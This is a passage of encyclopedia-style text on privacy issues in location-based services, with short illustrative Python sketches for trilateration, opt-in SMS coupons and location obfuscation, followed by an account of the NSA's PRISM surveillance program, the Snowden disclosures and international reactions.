There are various companies that sell access to individuals' location histories, in what is estimated to be a $12 billion industry composed of collectors, aggregators and marketplaces. As of 2021, a company named Near claimed to have data from 1.6 billion people in 44 different countries, Mobilewalla claimed data on 1.9 billion devices, and X-Mode claimed to have a database covering 25 percent of the U.S. adult population. An analysis conducted by the non-profit newsroom The Markup found that six out of 47 such companies claimed over a billion devices in their databases. As of 2021, there are no rules or laws governing who can buy an individual's data.[25]

There are a number of ways in which the location of an object, such as a mobile phone or device, can be determined.
Another emerging method for confirming location is IoT- and blockchain-based relative object location verification.[26]

With control-plane locating, sometimes referred to as positioning, the mobile phone service provider gets the location based on the radio signal delay of the closest cell-phone towers (for phones without satellite navigation features), which can be quite slow as it uses the 'voice control' channel.[9] In the UK, networks do not use trilateration; LBS services use a single base station, with a "radius" of inaccuracy, to determine a phone's location. This technique was the basis of the E-911 mandate and is still used to locate cellphones as a safety measure. Newer phones and PDAs typically have an integrated A-GPS chip. In addition, there are emerging techniques such as Real-Time Kinematics and Wi-Fi RTT (Round Trip Timing), part of Precision Time Management services in Wi-Fi and related protocols. Several technical factors must be met in order to provide a successful LBS.

Several categories of methods can be used to find the location of the subscriber.[7][27] The simple and standard solution is LBS based on a satellite navigation system such as Galileo or GPS. Sony Ericsson's "NearMe" is one such example; it is used to maintain knowledge of the exact location. Satellite navigation is based on the concept of trilateration, a basic geometric principle that allows finding one location if one knows its distances from other, already known locations (see the sketch below).

A low-cost alternative to using location technology to track the player is to not track at all. This has been referred to as "self-reported positioning". It was used in the mixed reality game Uncle Roy All Around You in 2003 and considered for use in augmented reality games in 2006.[28] Instead of tracking technologies, players were given a map which they could pan around and subsequently mark their location upon.[29][30] With the rise of location-based networking, this is more commonly known as a user "check-in".

Near LBS (NLBS) involves local-range technologies such as Bluetooth Low Energy, wireless LAN, infrared or near-field communication technologies, which are used to match devices to nearby services. This allows a person to access information based on their surroundings, and is especially suitable for use inside closed premises or in restricted or regional areas.

Another alternative is an operator- and satellite-independent location service based on access into the deep-level telecoms network (SS7). This solution enables accurate and quick determination of the geographical coordinates of mobile phones by providing operator-independent location data, and it also works for handsets that lack satellite navigation capability. In addition, the IP address can indicate the end-user's approximate location.

Many other local positioning systems and indoor positioning systems are available, especially for indoor use. GPS and GSM do not work very well indoors, so other techniques are used, including co-pilot beacon for CDMA networks, Bluetooth, UWB, RFID and Wi-Fi.[31]

Location-based services may be employed in a number of applications,[7] and for the carrier they provide added value by enabling additional services. In the U.S., the FCC requires that all carriers meet certain criteria for supporting location-based services (FCC 94–102). The mandate requires 95% of handsets to resolve within 300 meters for network-based tracking (e.g. triangulation) and 150 meters for handset-based tracking (e.g. GPS).
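The trilateration principle described above can be reduced to solving a small linear system once the circle equations are subtracted pairwise. The sketch below is a noise-free 2D illustration only (real receivers solve a least-squares problem over noisy ranges in three dimensions, and GPS additionally estimates a clock bias); the anchor coordinates are invented for the example:

```python
# 2D trilateration sketch: recover a position from exact distances to three
# known anchors. Subtracting the circle equations pairwise removes the
# quadratic terms, leaving two linear equations in (x, y).

def trilaterate(p1, d1, p2, d2, p3, d3):
    (x1, y1), (x2, y2), (x3, y3) = p1, p2, p3
    a1, b1 = 2 * (x2 - x1), 2 * (y2 - y1)
    c1 = d1**2 - d2**2 - x1**2 + x2**2 - y1**2 + y2**2
    a2, b2 = 2 * (x3 - x2), 2 * (y3 - y2)
    c2 = d2**2 - d3**2 - x2**2 + x3**2 - y2**2 + y3**2
    det = a1 * b2 - a2 * b1
    if abs(det) < 1e-12:
        raise ValueError("anchors are collinear; the position is ambiguous")
    return (c1 * b2 - c2 * b1) / det, (a1 * c2 - a2 * c1) / det

# Anchors at (0,0), (10,0), (0,10); the true position is (3, 4).
print(trilaterate((0, 0), 5.0,
                  (10, 0), 65 ** 0.5,
                  (0, 10), 45 ** 0.5))  # -> (3.0, 4.0)
```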
Accurate caller location is especially useful when dialing an emergency telephone number – such as enhanced 9-1-1 in North America, or 112 in Europe – so that the operator can dispatch emergency services such as emergency medical services, police or firefighters to the correct location. CDMA and iDEN operators have chosen to use GPS location technology for locating emergency callers. This led to rapidly increasing penetration of GPS in iDEN and CDMA handsets in North America and other parts of the world where CDMA is widely deployed. Even though no such rules are yet in place in Japan or in Europe, the number of GPS-enabled GSM/WCDMA handset models is growing fast. According to the independent wireless analyst firm Berg Insight, the attach rate for GPS grew rapidly in GSM/WCDMA handsets, from less than 8% in 2008 to 15% in 2009.[34]

As for economic impact, location-based services are estimated to have a $1.6 trillion impact on the US economy alone.[35]

European operators mainly use Cell ID for locating subscribers. This method is also used in Europe by companies that employ cell-based LBS as part of systems to recover stolen assets. In the US, companies such as Rave Wireless in New York use GPS and triangulation to enable college students to notify campus police when they are in trouble.

Currently there are roughly three different models for location-based apps on mobile devices. All allow one's location to be tracked by others, and each functions in the same way at a high level, but with differing functions and features.[36]

Mobile messaging plays an essential role in LBS. Messaging, especially SMS, has been used in combination with various LBS applications, such as location-based mobile advertising. SMS is still the main technology carrying mobile advertising / marketing campaigns to mobile phones. A classic example of LBS applications using SMS is the delivery of mobile coupons or discounts to mobile subscribers who are near advertising restaurants, cafés or movie theatres (a toy sketch of such a campaign appears below). The Singaporean mobile operator MobileOne carried out such an initiative in 2007 that involved many local marketers, and it was reported to be a huge success in terms of subscriber acceptance.

The Location Privacy Protection Act of 2012 (S.1223)[37] was introduced by Senator Al Franken (D-MN) in order to regulate the transmission and sharing of user location data in the United States. It is based on the individual's one-time consent to participate in these services (opt-in). The bill specifies the collecting entities, the collectable data and its usage. The bill does not, however, specify the period of time that the data-collecting entity can hold on to the user data (a limit of 24 hours seems appropriate, since most of the services use the data for immediate searches, communications, etc.), and the bill does not cover location data stored locally on the device (the user should be able to delete the contents of the location data document periodically, just as he would delete a log document). The bill, which was approved by the Senate Judiciary Committee, would also require mobile services to disclose the names of the advertising networks or other third parties with which they share consumers' locations.[38]

With the passing of the CAN-SPAM Act in 2003, it became illegal in the United States to send any message to the end user without the end user specifically opting in.
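The SMS coupon campaigns described above reduce, at their core, to a proximity test gated by consent. The toy Python sketch below makes that explicit; the data classes, the roughly 500 m closeness test, and all names are hypothetical, and the opt-in check reflects the CAN-SPAM constraint just mentioned:

```python
from dataclasses import dataclass

@dataclass
class Subscriber:
    phone: str
    lat: float
    lon: float
    opted_in: bool  # CAN-SPAM: no marketing messages without an explicit opt-in

@dataclass
class Venue:
    name: str
    lat: float
    lon: float
    coupon: str

def nearby(lat1, lon1, lat2, lon2, radius_deg=0.005):
    # Crude bounding-box test (~500 m at mid-latitudes); a real system
    # would use geodesic distance as in the geofencing sketch earlier.
    return abs(lat1 - lat2) <= radius_deg and abs(lon1 - lon2) <= radius_deg

def coupons_to_send(subscribers, venues):
    """Yield (phone, message) pairs for opted-in subscribers near a venue."""
    for s in subscribers:
        if not s.opted_in:
            continue  # skip non-consenting users
        for v in venues:
            if nearby(s.lat, s.lon, v.lat, v.lon):
                yield s.phone, f"{v.name}: {v.coupon}"

subs = [Subscriber("+6590000001", 1.3521, 103.8198, True),
        Subscriber("+6590000002", 1.3524, 103.8201, False)]
cafes = [Venue("Cafe Merlion", 1.3520, 103.8200, "10% off today")]
print(list(coupons_to_send(subs, cafes)))  # only the opted-in subscriber
```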
The CAN-SPAM Act's opt-in requirement put an additional challenge on LBS applications as far as "carrier-centric" services were concerned. As a result, there has been a focus on user-centric location-based services and applications which give the user control of the experience, typically by opting in first via a website or mobile interface (such as SMS, the mobile Web, and Java/BREW applications).

The European Union also provides a legal framework for data protection that may be applied to location-based services, most notably several European directives: (1) personal data: Directive 95/46/EC; (2) personal data in electronic communications: Directive 2002/58/EC; (3) data retention: Directive 2006/24/EC. However, the applicability of these legal provisions to the varying forms of LBS and of processing location data is unclear.[39]

One implication of this technology is that data about a subscriber's location and historical movements is owned and controlled by the network operators, including mobile carriers and mobile content providers.[40] Mobile content providers and app developers are a particular concern. Indeed, a 2013 MIT study[41][42] by de Montjoye et al. showed that four spatio-temporal points (approximate places and times) are enough to uniquely identify 95% of 1.5 million people in a mobility database. The study further shows that these constraints hold even when the resolution of the dataset is low; therefore, even coarse or blurred datasets provide little anonymity. A critical article by Dobson and Fisher[43] discusses the possibilities for misuse of location information.

Beside the legal framework, there exist several technical approaches to protecting privacy using privacy-enhancing technologies (PETs). Such PETs range from simplistic on/off switches[44] to sophisticated PETs using anonymization techniques (e.g. providing k-anonymity)[45] or cryptographic protocols.[46] Only a few LBSs offer such PETs; for example, Google Latitude offered an on/off switch and allowed users to pin their position to a freely definable location. It also remains an open question how users perceive and trust different PETs; only one study to date addresses user perception of state-of-the-art PETs.[47] Another set of techniques included among PETs are location obfuscation techniques, which slightly alter the location of the users in order to hide their real location while still being able to represent their position and receive services from their LBS provider (a minimal sketch appears below). Recent research has shown that crowdsourcing is also an effective approach to locating lost objects while still upholding the privacy of users. This is done by ensuring a limited level of interaction between users.[48]
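Of the obfuscation PETs just mentioned, the simplest variant is to report a point perturbed at random within a fixed radius of the true position. The Python sketch below illustrates that idea only; it is not one of the cited k-anonymity or cryptographic protocols, and the 500 m radius is an arbitrary choice:

```python
import math
import random

def obfuscate(lat, lon, radius_m=500.0):
    """Return a point drawn uniformly from a disc of radius_m around (lat, lon)."""
    r = radius_m * math.sqrt(random.random())   # sqrt -> uniform over the disc's area
    theta = random.uniform(0.0, 2.0 * math.pi)
    d_lat = (r * math.cos(theta)) / 111320.0    # metres per degree of latitude
    d_lon = (r * math.sin(theta)) / (111320.0 * math.cos(math.radians(lat)))
    return lat + d_lat, lon + d_lon

print(obfuscate(45.4215, -75.6972))  # Ottawa, blurred to within ~500 m
```

Note that, per the de Montjoye et al. result cited above, this kind of spatial blurring on its own does little against re-identification from repeated observations; it mainly limits the precision of any single reported fix.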
https://en.wikipedia.org/wiki/Location-based_service#Privacy_issues
PRISM is a code name for a program under which the United States National Security Agency (NSA) collects internet communications from various U.S. internet companies.[1][2][3] The program is also known by the SIGAD US-984XN.[4][5] PRISM collects stored internet communications based on demands made to internet companies such as Google LLC and Apple under Section 702 of the FISA Amendments Act of 2008 to turn over any data that match court-approved search terms.[6] Among other things, the NSA can use these PRISM requests to target communications that were encrypted when they traveled across the internet backbone, to focus on stored data that telecommunication filtering systems discarded earlier,[7][8] and to get data that is easier to handle.[9]

PRISM began in 2007 in the wake of the passage of the Protect America Act under the Bush Administration.[10][11] The program is operated under the supervision of the U.S. Foreign Intelligence Surveillance Court (FISA Court, or FISC) pursuant to the Foreign Intelligence Surveillance Act (FISA).[12] Its existence was leaked six years later by NSA contractor Edward Snowden, who warned that the extent of mass data collection was far greater than the public knew, and included what he characterized as "dangerous" and "criminal" activities.[13] The disclosures were published by The Guardian and The Washington Post on June 6, 2013. Subsequent documents have demonstrated a financial arrangement between the NSA's Special Source Operations (SSO) division and PRISM partners in the millions of dollars.[14]

Documents indicate that PRISM is "the number one source of raw intelligence used for NSA analytic reports", and that it accounts for 91% of the NSA's internet traffic acquired under FISA Section 702 authority.[15][16] The leaked information came after the revelation that the FISA Court had been ordering a subsidiary of telecommunications company Verizon Communications to turn over logs tracking all of its customers' telephone calls to the NSA.[17][18]

U.S. government officials have disputed criticisms of PRISM in the Guardian and Washington Post articles and have defended the program, asserting that it cannot be used on domestic targets without a warrant. They additionally claim that the program has helped to prevent acts of terrorism, and that it receives independent oversight from the federal government's executive, judicial and legislative branches.[19][20] On June 19, 2013, U.S.
President Barack Obama, during a visit to Germany, stated that the NSA's data gathering practices constitute "a circumscribed, narrow system directed at us being able to protect our people."[21]

Edward Snowden publicly revealed the existence of PRISM through a series of classified documents leaked to journalists of The Washington Post and The Guardian while he was working as an NSA contractor, before fleeing to Hong Kong.[1][2] The leaked documents included 41 PowerPoint slides, four of which were published in news articles.[1][2]

The documents identified several technology companies as participants in the PRISM program, including Microsoft in 2007, Yahoo! in 2008, Google in 2009, Facebook in 2009, Paltalk in 2009, YouTube in 2010, AOL in 2011, Skype in 2011 and Apple in 2012.[22] The speaker's notes in the briefing document reviewed by The Washington Post indicated that "98 percent of PRISM production is based on Yahoo, Google, and Microsoft".[1]

The slide presentation stated that much of the world's electronic communications pass through the U.S., because electronic communications data tend to follow the least expensive route rather than the most physically direct route, and the bulk of the world's internet infrastructure is based in the United States.[15] The presentation noted that these facts provide United States intelligence analysts with opportunities for intercepting the communications of foreign targets as their electronic data pass into or through the United States.[2][15]

Snowden's subsequent disclosures included statements that government agencies such as the United Kingdom's GCHQ also undertook mass interception and tracking of internet and communications data[23] – described by Germany as "nightmarish" if true[24] – allegations that the NSA engaged in "dangerous" and "criminal" activity by "hacking" civilian infrastructure networks in other countries such as "universities, hospitals, and private businesses",[13] and the allegation that compliance offered only a very limited restrictive effect on mass data collection practices (including of Americans), since restrictions "are policy-based, not technically based, and can change at any time", adding that "Additionally, audits are cursory, incomplete, and easily fooled by fake justifications",[13] with numerous self-granted exceptions, and that NSA policies encourage staff to assume the benefit of the doubt in cases of uncertainty.[25][26][27]

Below are a number of slides released by Edward Snowden showing the operation and processes behind the PRISM program. The "FAA" referred to is Section 702 of the FISA Amendments Act ("FAA"), not the Federal Aviation Administration, which is more widely known by the same initialism.[28] The French newspaper Le Monde disclosed new PRISM slides (see pages 4, 7 and 8) from the "PRISM/US-984XN Overview" presentation on October 21, 2013.[29] The British newspaper The Guardian disclosed new PRISM slides (see pages 3 and 6) in November 2013 which, on the one hand, compare PRISM with the Upstream program, and on the other hand deal with collaboration between the NSA's Threat Operations Center and the FBI.[30]

PRISM is a program of the Special Source Operations (SSO) division of the NSA, which, in the tradition of the NSA's intelligence alliances, has cooperated with as many as 100 trusted U.S. companies since the 1970s.[1] A prior program, the Terrorist Surveillance Program,[31][32] was implemented in the wake of the September 11 attacks under the George W.
Bush Administration, but was widely criticized and challenged as illegal because it did not include warrants obtained from the Foreign Intelligence Surveillance Court.[32][33][34][35][36] PRISM, by contrast, was authorized by the Foreign Intelligence Surveillance Court.[15]

PRISM was enabled under President Bush by the Protect America Act of 2007 and by the FISA Amendments Act of 2008, which immunizes private companies from legal action when they cooperate with U.S. government agencies in intelligence collection. In 2012 the act was renewed by Congress under President Obama for an additional five years, through December 2017.[2][37][38] According to The Register, the FISA Amendments Act of 2008 "specifically authorizes intelligence agencies to monitor the phone, email, and other communications of U.S. citizens for up to a week without obtaining a warrant" when one of the parties is outside the U.S.[37]

The most detailed description of the PRISM program can be found in a report about the NSA's collection efforts under Section 702 FAA, released by the Privacy and Civil Liberties Oversight Board (PCLOB) on July 2, 2014.[39] According to this report, PRISM is only used to collect internet communications, not telephone conversations. These internet communications are not collected in bulk, but in a targeted way: only communications that are to or from specific selectors, such as e-mail addresses, can be gathered. Under PRISM, there is no collection based on keywords or names.[39]

The actual collection process is done by the Data Intercept Technology Unit (DITU) of the FBI, which on behalf of the NSA sends the selectors to the U.S. internet service providers, which were previously served with a Section 702 directive. Under this directive, the provider is legally obliged to hand over (to DITU) all communications to or from the selectors provided by the government.[39] DITU then sends these communications to the NSA, where they are stored in various databases, depending on their type. Data, both content and metadata, that have already been collected under the PRISM program may be searched for both US and non-US person identifiers. These kinds of queries became known as "back-door searches" and are conducted by the NSA, FBI and CIA.[40] Each of these agencies has slightly different protocols and safeguards to protect searches with a US person identifier.[39]

Internal NSA presentation slides included in the various media disclosures show that the NSA could unilaterally access data and perform "extensive, in-depth surveillance on live communications and stored information", with examples including email, video and voice chat, videos, photos, voice-over-IP chats (such as Skype), file transfers, and social networking details.[2] Snowden summarized: "in general, the reality is this: if an NSA, FBI, CIA, DIA, etc. analyst has access to query raw SIGINT [signals intelligence] databases, they can enter and get results for anything they want."[13]

According to The Washington Post, intelligence analysts search PRISM data using terms intended to identify suspicious communications of targets whom the analysts suspect, with at least 51 percent confidence, not to be U.S. citizens; but in the process, communication data of some U.S. citizens are also collected unintentionally.[1] Training materials for analysts tell them that while they should periodically report such accidental collection of non-foreign U.S.
data, "it's nothing to worry about."[1][41] According toThe Guardian, NSA had access to chats and emails on Hotmail.com and Skype because Microsoft had "developed a surveillance capability to deal" with the interception of chats, and "for Prism collection against Microsoft email services will be unaffected because Prism collects this data prior to encryption."[42][43] Also according to The Guardian'sGlenn Greenwaldeven low-level NSA analysts are allowed to search and listen to the communications of Americans and other people without court approval and supervision. Greenwald said low level Analysts can, via systems like PRISM, "listen to whatever emails they want, whatever telephone calls, browsing histories,Microsoft Worddocuments.[31]And it's all done with no need to go to a court, with no need to even get supervisor approval on the part of the analyst."[44] He added that the NSA databank, with its years of collected communications, allows analysts to search that database and listen "to the calls or read the emails of everything that the NSA has stored, or look at the browsing histories or Google search terms that you've entered, and it also alerts them to any further activity that people connected to that email address or that IP address do in the future."[44]Greenwald was referring in the context of the foregoing quotes to the NSA programXKeyscore.[45] Unified Targeting Tool Shortly after publication of the reports byThe GuardianandThe Washington Post, the United StatesDirector of National Intelligence,James Clapper, on June 7, 2013, released a statement confirming that for nearly six years the government of the United States had been using large internet services companies such as Facebook to collect information on foreigners outside the United States as a defense against national security threats.[17]The statement read in part, "The GuardianandThe Washington Postarticles refer to collection of communications pursuant to Section 702 of theForeign Intelligence Surveillance Act. They contain numerous inaccuracies."[47]He went on to say, "Section 702 is a provision of FISA that is designed to facilitate the acquisition of foreign intelligence information concerning non-U.S. persons located outside the United States. It cannot be used to intentionally target any U.S. citizen, any other U.S. person, or anyone located within the United States."[47]Clapper concluded his statement by stating, "The unauthorized disclosure of information about this important and entirely legal program is reprehensible and risks important protections for the security of Americans."[47]On March 12, 2013, Clapper had told the United States Senate Select Committee on Intelligence that the NSA does "not wittingly" collect any type of data on millions or hundreds of millions of Americans.[48]Clapper later admitted the statement he made on March 12, 2013, was a lie,[49]or in his words "I responded in what I thought was the most truthful, or least untruthful manner by saying no."[50] On June 7, 2013, U.S. PresidentBarack Obama, referring to the PRISM program[51]and the NSA's telephone calls logging program, said, "What you've got is two programs that were originally authorized by Congress, have been repeatedly authorized by Congress. Bipartisan majorities have approved them. Congress is continually briefed on how these are conducted. There are a whole range of safeguards involved. 
And federal judges are overseeing the entire program throughout."[52] He also said, "You can't have 100 percent security and then also have 100 percent privacy and zero inconvenience. You know, we're going to have to make some choices as a society."[52] Obama also said that government collection of data was needed in order to catch terrorists.[53] In separate statements, senior Obama administration officials (not mentioned by name in the source) said that Congress had been briefed 13 times on the programs since 2009.[54]

On June 8, 2013, Director of National Intelligence Clapper made an additional public statement about PRISM and released a fact sheet providing further information about the program, which he described as "an internal government computer system used to facilitate the government's statutorily authorized collection of foreign intelligence information from electronic communication service providers under court supervision, as authorized by Section 702 of the Foreign Intelligence Surveillance Act (FISA) (50 U.S.C. § 1881a)."[55][56] The fact sheet stated that "the surveillance activities published in The Guardian and The Washington Post are lawful and conducted under authorities widely known and discussed, and fully debated and authorized by Congress."[55] The fact sheet also stated that "the United States Government does not unilaterally obtain information from the servers of U.S. electronic communication service providers. All such information is obtained with FISA Court approval and with the knowledge of the provider based on a written directive from the Attorney General and the Director of National Intelligence." It said that the Attorney General provides FISA Court rulings and semi-annual reports about PRISM activities to Congress, "provid[ing] an unprecedented degree of accountability and transparency."[55] Democratic senators Udall and Wyden, who serve on the U.S. Senate Select Committee on Intelligence, subsequently criticized the fact sheet as being inaccurate.[clarification needed] NSA Director General Keith Alexander acknowledged the errors, stating that the fact sheet "could have more precisely described" the requirements governing the collection of e-mail and other internet content from US companies. The fact sheet was withdrawn from the NSA's website around June 26.[57]

In a closed-door Senate hearing around June 11, FBI Director Robert Mueller said that Snowden's leaks had caused "significant harm to our nation and to our safety."[58] In the same Senate hearing, NSA Director Alexander defended the program.[further explanation needed] Alexander's defense was immediately criticized by Senators Udall and Wyden, who said they saw no evidence that the NSA programs had produced "uniquely valuable intelligence."
In a joint statement, they wrote, "Gen Alexander's testimony yesterday suggested that the NSA's bulk phone records collection program helped thwart 'dozens' of terrorist attacks, but all of the plots that he mentioned appear to have been identified using other collection methods."[58][59]

On June 18, NSA Director Alexander said in an open hearing before the House Intelligence Committee of Congress that communications surveillance had helped prevent more than 50 potential terrorist attacks worldwide (at least 10 of them involving terrorism suspects or targets in the United States) between 2001 and 2013, and that the PRISM web traffic surveillance program contributed in over 90 percent of those cases.[60][61][62] According to court records, one example Alexander gave, regarding a thwarted attack by al-Qaeda on the New York Stock Exchange, was not in fact foiled by surveillance.[63] Several senators wrote to Director of National Intelligence Clapper asking him to provide other examples.[64]

U.S. intelligence officials, speaking on condition of anonymity, told various news outlets that by June 24 they were already seeing what they said was evidence that suspected terrorists had begun changing their communication practices in order to evade detection by the surveillance tools disclosed by Snowden.[65][66]

In contrast to their swift and forceful reactions the previous day to allegations that the government had been conducting surveillance of United States citizens' telephone records, Congressional leaders initially had little to say about the PRISM program the day after leaked information about the program was published. Several lawmakers declined to discuss PRISM, citing its top-secret classification,[67] and others said that they had not been aware of the program.[68] After statements had been released by the president and the Director of National Intelligence, some lawmakers began to comment, among them Senator John McCain (R-AZ); Senator Dianne Feinstein (D-CA), chair of the Senate Intelligence Committee; Senator Rand Paul (R-KY); Senator Susan Collins (R-ME), member of the Senate Intelligence Committee and past member of the Homeland Security Committee; Representative Jim Sensenbrenner (R-WI), principal sponsor of the Patriot Act; Representative Mike Rogers (R-MI), chairman of the Permanent Select Committee on Intelligence; Senator Mark Udall (D-CO); Representative Todd Rokita (R-IN); Representative Luis Gutierrez (D-IL); and Senator Ron Wyden (D-OR).

Following these statements, some lawmakers from both parties warned national security officials during a hearing before the House Judiciary Committee that they must change their use of sweeping National Security Agency surveillance programs or face losing the provisions of the Foreign Intelligence Surveillance Act that have allowed for the agency's mass collection of telephone metadata.[78] "Section 215 expires at the end of 2015, and unless you realize you've got a problem, that is not going to be renewed," Rep. Jim Sensenbrenner, R-Wis., author of the USA Patriot Act, threatened during the hearing.[78] "It's got to be changed, and you've got to change how you operate section 215.
Otherwise, in two and a half years, you're not going to have it anymore."[78]

Leaks of classified documents pointed to the role of a special court in enabling the government's secret surveillance programs, but members of the court maintained they were not collaborating with the executive branch.[79] The New York Times, however, reported in July 2013 that in "more than a dozen classified rulings, the nation's surveillance court has created a secret body of law giving the National Security Agency the power to amass vast collections of data on Americans while pursuing not only terrorism suspects, but also people possibly involved in nuclear proliferation, espionage and cyberattacks."[80] After members of the U.S. Congress pressed the Foreign Intelligence Surveillance Court to release declassified versions of its secret rulings, the court dismissed those requests, arguing that the decisions cannot be declassified because they contain classified information.[81] Reggie Walton, the FISA court's presiding judge at the time, said in a statement: "The perception that the court is a rubber stamp is absolutely false. There is a rigorous review process of applications submitted by the executive branch, spearheaded initially by five judicial branch lawyers who are national security experts, and then by the judges, to ensure that the court's authorizations comport with what the applicable statutes authorize."[82] The accusation of being a "rubber stamp" was further rejected by Walton, who wrote in a letter to Senator Patrick J. Leahy: "The annual statistics provided to Congress by the Attorney General ...—frequently cited in press reports as a suggestion that the Court's approval rate of applications is over 99%—reflect only the number of final applications submitted to and acted on by the Court. These statistics do not reflect the fact that many applications are altered prior to final submission or even withheld from final submission entirely, often after an indication that a judge would not approve them."[83]

The U.S. military has acknowledged blocking access to parts of The Guardian website for thousands of defense personnel across the country,[84] and blocking the entire Guardian website for personnel stationed throughout Afghanistan, the Middle East, and South Asia.[85] A spokesman said the military was filtering out reports and content relating to government surveillance programs to preserve "network hygiene" and prevent any classified material from appearing on unclassified parts of its computer systems.[84] Access to The Washington Post, which also published information on classified NSA surveillance programs disclosed by Edward Snowden, had not been blocked at the time the blocking of access to The Guardian was reported.[85]

The former head of the Austrian Federal Office for the Protection of the Constitution and Counterterrorism, Gert-René Polli, stated that he knew the PRISM program under a different name and that surveillance activities had occurred in Austria as well.
Polli had publicly stated in 2009 that he had received requests from US intelligence agencies to do things that would be in violation of Austrian law, which Polli refused to allow.[86][87]

The Australian government has said it will investigate the impact of the PRISM program and the use of the Pine Gap surveillance facility on the privacy of Australian citizens.[88] Australia's former foreign minister Bob Carr said that Australians should not be concerned about PRISM but that cybersecurity is high on the government's list of concerns.[89] The Australian foreign minister Julie Bishop stated that the acts of Edward Snowden were treachery and offered a staunch defence of her nation's intelligence co-operation with the United States.[90]

Brazil's president at the time, Dilma Rousseff, responded to Snowden's reports that the NSA spied on her phone calls and emails by cancelling a planned October 2013 state visit to the United States and demanding an official apology, which by October 20, 2013, had not come.[91] Rousseff also condemned the spying as unacceptable, in harsh words, in a speech before the UN General Assembly on September 24, 2013.[92] As a result, Boeing lost out on a US$4.5 billion contract for fighter jets to Sweden's Saab Group.[93]

Canada's national cryptologic agency, the Communications Security Establishment (CSE), said that commenting on PRISM "would undermine CSE's ability to carry out its mandate." Privacy Commissioner Jennifer Stoddart lamented Canada's standards when it comes to protecting personal online privacy, stating "We have fallen too far behind" in her report. "While other nations' data protection authorities have the legal power to make binding orders, levy hefty fines and take meaningful action in the event of serious data breaches, we are restricted to a 'soft' approach: persuasion, encouragement and, at the most, the potential to publish the names of transgressors in the public interest." And, "when push comes to shove," Stoddart wrote, "short of a costly and time-consuming court battle, we have no power to enforce our recommendations."[94][95]

On 20 October 2013, a committee of the European Parliament backed a measure that, if enacted, would require American companies to seek clearance from European officials before complying with United States warrants seeking private data. The legislation had been under consideration for two years. The vote is part of efforts in Europe to shield citizens from online surveillance in the wake of revelations about a far-reaching spying program by the U.S. National Security Agency.[96] Germany and France have also had ongoing mutual talks about how they can keep European email traffic from going across American servers.[97]

On October 21, 2013, the French Foreign Minister, Laurent Fabius, summoned the U.S. Ambassador, Charles Rivkin, to the Quai d'Orsay in Paris to protest large-scale spying on French citizens by the U.S. National Security Agency (NSA). Paris prosecutors had opened preliminary inquiries into the NSA program in July, but Fabius said, "...
obviously we need to go further" and "we must quickly assure that these practices aren't repeated."[98]

Germany did not receive any raw PRISM data, according to a Reuters report.[99] German Chancellor Angela Merkel said that "the internet is new to all of us" to explain the nature of the program; Matthew Schofield of the McClatchy Washington Bureau said, "She was roundly mocked for that statement."[100] Gert-René Polli, a former Austrian counter-terrorism official, said in 2013 that it was "absurd and unnatural" for the German authorities to pretend not to have known anything.[86][87] The German Army was using PRISM to support its operations in Afghanistan as early as 2011.[101] In October 2013, it was reported that the NSA had monitored Merkel's cell phone.[102] The United States denied the report, but following the allegations, Merkel called President Obama and told him that spying on friends was "never acceptable, no matter in what situation."[103]

The Israeli newspaper Calcalist discussed[104] a Business Insider article[105] about the possible involvement of technologies from two secretive Israeli companies in the PRISM program—Verint Systems and Narus.

After finding out about the PRISM program, the Mexican government began constructing its own spying program to surveil its own citizens. According to Jenaro Villamil, a writer for Proceso, CISEN, Mexico's intelligence agency, started to work with IBM and Hewlett-Packard to develop its own data-gathering software. "Facebook, Twitter, emails and other social network sites are going to be priority."[106]

In New Zealand, University of Otago information science Associate Professor Hank Wolfe said that "under what was unofficially known as the Five Eyes Alliance, New Zealand and other governments, including the United States, Australia, Canada, and Britain, dealt with internal spying by saying they didn't do it. But they have all the partners doing it for them and then they share all the information."[107] Edward Snowden, in a live-streamed Google Hangout with Kim Dotcom and Julian Assange, alleged that he had received intelligence from New Zealand, and that the NSA has listening posts in New Zealand.[108]

At a meeting of European Union leaders held the week of 21 October 2013, Mariano Rajoy, Spain's prime minister, said that "spying activities aren't proper among partner countries and allies". On 28 October 2013, the Spanish government summoned the American ambassador, James Costos, to address allegations that the U.S. had collected data on 60 million telephone calls in Spain. Separately, Íñigo Méndez de Vigo, a Spanish secretary of state, referred to the need to maintain "a necessary balance" between security and privacy concerns, but said that the recent allegations of spying, "if proven to be true, are improper and unacceptable between partners and friendly countries".[109]

In the United Kingdom, the Government Communications Headquarters (GCHQ), which also has its own surveillance program, Tempora, had access to the PRISM program on or before June 2010 and wrote 197 reports with it in 2012 alone. The Intelligence and Security Committee of the UK Parliament reviewed the reports GCHQ produced on the basis of intelligence sought from the US.
They found that in each case a warrant for interception was in place in accordance with the legal safeguards contained in UK law.[110] In August 2013, The Guardian newspaper's offices were visited by technicians from GCHQ, who ordered and supervised the destruction of the hard drives containing information acquired from Snowden.[111]

The original Washington Post and Guardian articles reporting on PRISM noted that one of the leaked briefing documents said PRISM involves collection of data "directly from the servers" of several major internet service providers.[1][2] Corporate executives of several companies identified in the leaked documents told The Guardian that they had no knowledge of the PRISM program in particular, and also denied making information available to the government on the scale alleged by news reports.[2][112] Statements of several of the companies named in the leaked documents were reported by TechCrunch and The Washington Post.[113][114]

In response to the technology companies' denials that the NSA was able to directly access the companies' servers, The New York Times reported that sources had stated the NSA was gathering the surveillance data from the companies using other technical means in response to court orders for specific sets of data.[17] The Washington Post suggested, "It is possible that the conflict between the PRISM slides and the company spokesmen is the result of imprecision on the part of the NSA author. In another classified report obtained by The Post, the arrangement is described as allowing 'collection managers [to send] content tasking instructions directly to equipment installed at company-controlled locations,' rather than directly to company servers."[1] "[I]n context, 'direct' is more likely to mean that the NSA is receiving data sent to them deliberately by the tech companies, as opposed to intercepting communications as they're transmitted to some other destination."[114]

"If these companies received an order under the FISA Amendments Act, they are forbidden by law from disclosing having received the order and disclosing any information about the order at all," Mark Rumold, staff attorney at the Electronic Frontier Foundation, told ABC News.[117]

On May 28, 2013, Google was ordered by United States District Court Judge Susan Illston to comply with a National Security Letter issued by the FBI to provide user data without a warrant.[118] Kurt Opsahl, a senior staff attorney at the Electronic Frontier Foundation, in an interview with VentureBeat, said, "I certainly appreciate that Google put out a transparency report, but it appears that the transparency didn't include this. I wouldn't be surprised if they were subject to a gag order."[119]

The New York Times reported on June 7, 2013, that "Twitter declined to make it easier for the government.
